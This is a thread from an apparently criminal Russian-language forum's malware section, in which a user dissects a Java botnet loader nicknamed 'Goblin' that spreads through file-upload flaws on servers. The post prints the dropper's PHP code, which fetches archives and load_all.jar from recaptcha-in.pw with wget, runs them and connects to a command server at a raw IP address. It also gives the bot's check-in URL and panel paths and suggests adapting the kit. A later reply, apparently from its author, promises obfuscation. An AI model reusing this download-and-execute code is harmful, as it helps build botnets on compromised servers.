1. Внимание!!! Не заходит на форум? Хотите сохранить доступность к нам на 99.9%? Обязательно запишите все зеркала проекта! Именно по этому мы настоятельно рекомендуем использовать онион домен для TOR-Браузера, там доступность форума будет максимальной. Ссылка для установки и все зеркала в этой темe.

    Зеркало для TOR-Браузера - http://norabizt5qqxefxy.onion

    Чистое зеркало для обычных браузеров - https://nora.holiday

    Скрыть объявление

Неизвестный софт Goblin

Тема в разделе "ВИРУСОЛОГИЯ", создана пользователем zir0diy, 12 авг 2017.

  1. zir0diy
    off

    zir0diy n.N.N.n.n УЧАСТНИКИ

    Сообщения:
    175
    Пол:
    Мужской
    Адрес:
    error
    Репутация:
    34
    Сфера:
    Вирусология
    Неизвестный софт Goblin
    Доброго дня, мой взгляд заинтересовал зверек, которого я прозвал Гоблин исходя из названия файлов. Ничего нормального в голову не пришло, если погуглить , то вылетает такая персона))))
    [​IMG]
    Дми́трий Ю́рьевич Пучко́в — российский писатель, публицист и переводчик, известный под творческим псевдонимом старший оперуполномоченный Goblin. Разработчик компьютерных игр, блогер.Википедия
    Родился: 2 августа 1961 г. (56 лет), Кропивницкий, Украина
    Рост: 5 футов 10 дюймов
    Родители: Юрий Пучков
    Фильмы: Звёздные войны: Буря в стакане


    Это своего рода ботнет (linux и есть развитие под win) с встроенным лоудером и своей админкой, который работает с помощью java. Распространяется он через уязвимость загрузки файлов на сервере, он загружает вредоносные файлы, которое пытается загрузить load_all.jar на сервер и запустит его.

    Код:
    $out = shell_exec("java -version 2>&1");
    preg_match("/version\s+\"1\.(\d+)\./",$out,$matches);
    $ver = 0;
    if($matches)$ver = (int)$matches[1];
    Если это зверь не может найти установленный java на сервере, он загружает бинарные файлы JAVA на сервер.

    Код:
    hell_exec("export JAVA_HOME=".dirname(__FILE__)."/tmp");
    
    shell_exec("rm ".__FILE__);
    
    shell_exec("pkill java");
    if((defined('PHP_INT_SIZE'))&&(PHP_INT_SIZE == 8)){
    shell_exec("wget http://recaptcha-in.pw/64/tmp.tar.gz");
    shell_exec("tar -xzf tmp.tar.gz");
    shell_exec("rm tmp.tar.gz");
    }else{
    shell_exec("wget http://recaptcha-in.pw/32/tmp.tar.gz");
    shell_exec("tar -xzf tmp.tar.gz");
    shell_exec("rm tmp.tar.gz");
    Ссылки актуальные, все можно скачать с ботовода.

    После всех проверок и установок загружает load_all.jar

    Код:
    ChDir ( "TMP / бен");
    Shell_exec ("rm load_all.jar");
    Shell_exec ("wget http: //recaptcha-in.pw/load_all.jar");
    Shell_exec ("chmod 777 -R.");
    Shell_exec ("nohup ./java -jar load_all.jar http: //83.166.243.65/b");
    

    Последняя команда запускает зверя на java и подключается к удаленному командному центру.

    Есть декомпилировать jar: load_all_source_from_jdcore.zip

    Отстук на gate:
    Код:
    String geturl = host + "/b/check?ver=" + struct.Config.ver + "&os=" + base.Hex.StrToUrlHex(System.getProperty("os.name")) + "&java=1&token=" + Helper.getToken() + "&host=" + base.Hex.StrToUrlHex(Helper.getHost());
    Авторизация http: //83.166.243.65/b

    http://83.166.243.65/b/upload/shellfiles/
    http://83.166.243.65/b/upload/builder/jver.txt

    Бегло пробежался, можно заточить под себя.
     

    Вложения:

  2. ARMANI
    off

    ARMANI GUM УЧАСТНИКИ

    Сообщения:
    83
    Пол:
    Мужской
    Адрес:
    MOSCOW
    Репутация:
    7
    Сфера:
    Кардинг
    ti chto kyril?)
     
  3. svinka_pepa
    off

    svinka_pepa Активно в Норе УЧАСТНИКИ

    Сообщения:
    40
    Пол:
    Мужской
    Адрес:
    2x2
    Репутация:
    8
    Я так понял на никсах с бинарем жава на любых правах будет работать? нободи, апач?
     
  4. var
    off

    var Пока одупляюсь УЧАСТНИКИ

    Сообщения:
    5
    Пол:
    Мужской
    Адрес:
    не дом и не улица
    Репутация:
    0
    Сфера:
    Кодинг
    Как было в одном из фильмов в переводе гоблина
    "Ставить на программы защиту от копирования - самая безпонтовая вешь в нашей одинокой галактике"

    Ребята конечно не догадались обработать обфускатором то, что у меня лежало в heredoc.
    В следующей версии прогоню через java обфускатор сам лоудер, а также все инсталляционные скрипты.
     
    Последнее редактирование: 20 авг 2017